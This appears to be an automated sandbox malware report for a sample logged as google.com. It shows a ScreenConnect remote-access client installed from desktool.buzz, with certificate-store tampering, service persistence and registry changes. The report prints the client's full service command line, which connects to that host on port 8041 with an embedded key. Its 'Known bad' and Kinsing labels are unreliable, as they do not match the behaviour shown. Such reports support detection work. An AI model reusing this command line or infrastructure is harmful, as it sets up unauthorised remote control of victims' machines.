Malware Analysis Report

2024-10-23 21:16

Sample ID: 240125-vxdlfacdfl
Target: https://google.com
Tags: kinsing loader persistence
Score: 10/10


Analysis Overview

Score: 10/10

Threat Level: Known bad

The file https://google.com was found to be: Known bad.

Malicious Activity Summary

kinsing loader persistence

Kinsing

Downloads MZ/PE file

Sets service image path in registry

Manipulates Digital Signatures

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Modifies data under HKEY_USERS

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-01-25 17:21

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-01-25 17:21
Reported: 2024-01-25 17:41
Platform: win10v2004-20231215-en
Max time kernel: 516s
Max time network: 517s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffac9ef9758,0x7ffac9ef9768,0x7ffac9ef9778

Signatures

Kinsing

loader kinsing

Downloads MZ/PE file

Manipulates Digital Signatures

Description Indicator Process Target
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 C:\Users\Admin\Downloads\support.Client.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = [DER certificate blob omitted] C:\Users\Admin\Downloads\support.Client.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = [certificate blob omitted] C:\Users\Admin\Downloads\support.Client.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C C:\Users\Admin\Downloads\support.Client.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (50ef8fa4-9a64-466f-978c-e78b5206d7cb)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\76DXXRDA.GZ2\\R9ERHRLR.ZPO\\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\\ScreenConnect.ClientService.exe\" \"?y=Guest&h=desktool.buzz&p=8041&s=50ef8fa4-9a64-466f-978c-e78b5206d7cb&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAW6Fa6eKoxEOVkfIEPqjcEAAAAAACAAAAAAAQZgAAAAEAACAAAADBvLzFh%2bNm%2byK1vN90thNA2jW14sFgU8y0B6MausHTAQAAAAAOgAAAAAIAACAAAABd1IL4IVPQiOfxrDb08htqJDE6BEgduH0jbt1XV6am1qAEAADlwe04F8UBIvRpATJgqNrAR3mwSiH4yOpWNV3cefXxCu637MtUAF%2fV1Rj%2bYAU1DzBhmzX7HFqw2LH9Pd7E6rdP9%2bxW9TgmkEZm4wwg6jmQNPByYKweglHH2mclJOO%2f0oyYjnRHf%2boQOnTnA9Es40l95PmRYSkCaRSt8bJCFVW8tQ3PM9v5yV6UCqYbfmXkxfd9ugsBGLv58c4LeOWxfrsS913KbVcz736jDiED11gE2UMuLBQqrtQE%2fk50SQAdxgekQWywTo0Ef%2buL3yo2A6XxhGjaGkc81hI9GekzuTHTimuArJhTHR46f1XIrkaYwQVLgWhb3oCk7dc52RPIKQl2TZ5ybUoflNX3KAMXW43z%2b2PjFuaJgTjS48KnwihZjiZeRuQrbGvjVhTR8LIz13eR1rTzwuz2z%2bHmqMe5tOsKk%2fzDr%2bNq65hxmW%2bTbye6oTQQ8cZOVxB2LtxJUwIpfG3yijKBUNN%2fAlD4WmjUNuCL%2fSa6QkpduuEcKNSjmb%2bJfnUS2Cik%2ftOi8OHQKD03gF%2fpOvAEhNrxPsA5NaiGmuwbFJtk3u7npr%2b6BRMiUYB2nrYWrC4xaCJp30z%2f9byK7xiSCtxJryL1c8v2Wb3YWQNVRT24WjIwsGpxK0meIBv0jjZ%2fbg1NikJ9PT4CJUE3gWqZ79nYthUw2fFkl78rX35cnwz7Mc3PwsHEAq5rt6oUmwwHbz9mUQ0N8VDKIFVDSh12Mzt2Fzc%2fHv3uXLJOz2zQLVJITwDsqBIblcWGb5ZMS86wpww4Otc86FQRzMsnX1XuqkP%2bBJ%2fsE4HaVUO4qsaBRYBi27n5piamWbj3u5qckfyzRImCBNkDbN39bsYoup02cxWkjJeJ%2b253AJGcik4AJGMCmfWFDXx6f%2by52YJi0wDGBH38RdT4XZmDTOD%2b%2fpvHGREkE83D6ACXEALhuXrUYVOAmNSsZbyu94CnRw6FhEorNRsi0H6o
7M%2b7BXYM4qVUsZi1YfYWbbrnRIjmC6ZXr0%2f%2fEqSugWLpYoBFwFcgsY80wcOCyWVjAvZ%2fSLOmqY%2fzeOsihrxxsFIfXofVJogOOUVRKo1lQHivst2ShkI3XF%2fX9boPNO%2bsB9dJe4zcsKdZMZWoB0AJGprf1TY4xyZ3J2xRZf%2ftp8u5VnhwQFXbtJ%2ftIjmWL7E0JNeG3mV%2fmhHi4NqkeaoifZy2xfw9upInX%2bXm5snrvIQGdhrMAXsLu7KtXqaK53SWMbEXRISwyLp3vyv5XNVy73xDn6kXL5sOpCtB7HgMoeWPbKs6KTtpgs%2fy9Bl7wQ6JeeXc0ZIoOaaxTsxidv7PF4Yko8PbMJp3TjdHaoigDZsc3OYxPaTnR0BT2dV2jsof1eHIe0fKqLh6SLopXzDr7PHxRIaj9WxjO%2fQmrEZsfByS5bnw2Q21CPqGWI4i7WkRGd88HJoGAEbWaux35HzC7U7vFronvWVSAjjhyY1tzEdbmwlcq8xOgUZhYmYiHLXLw%2fH37ZpA0%2fsO5mq1qvAuvMTLh4vMSHOxFvNnjgsCGaTOM8ZbQ%2fgJaMtmIKX2z1WzeYudqRIxIO5B3dpioQa%2frHSG4B9LNg2WZEAAAADHLwmv4dVT7d5WGReMbMvSiGP2OThXgOTF%2fxTnxISh4MW8RqAiLumK1kwjwyK1Ds2UAjRvqoENUa5YLj%2fmRLfY&r=&i=Sam%20Dan\" \"1\"" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\user.config C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
File opened for modification C:\Windows\system32\user.config C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133506775634894801" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178\DigestValue = 46be0d5a7db56cb1ad77274709d0db053a3c0999 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_6c2e4193f8f6130c C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8\identity = 53637265656e436f6e6e6563742e57696e646f77732c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1} C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56 = 01 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\ComponentStore_RandomString = "7GC7TZ6JY72V0NLXBWJELEDE" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 30003000300031002f00300031002f00300031002000300030003a00300030003a00300030000000 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3\Files C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\DigestValue = a23587d95e94d7d5222b675867b3d525c2b4db5f C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Categories C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0002_fd4f63879c71b908\appid = 68747470733a2f2f6465736b746f6f6c2e62757a7a2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\Files C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\Files\ScreenConnect.WindowsClient.exe.config_f7 = 01 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3\identity = 53637265656e436f6e6e6563742e436c69656e74536572766963652c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\lock!1a000000873e5c0e38060000c00a0000000000000000000 = 30303030303633382c30316461346662353339366665623738 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Visibility C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3\lock!18000000873e5c0e38060000c00a0000000000000000000 = 30303030303633382c30316461346662353339366665623738 C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe N/A
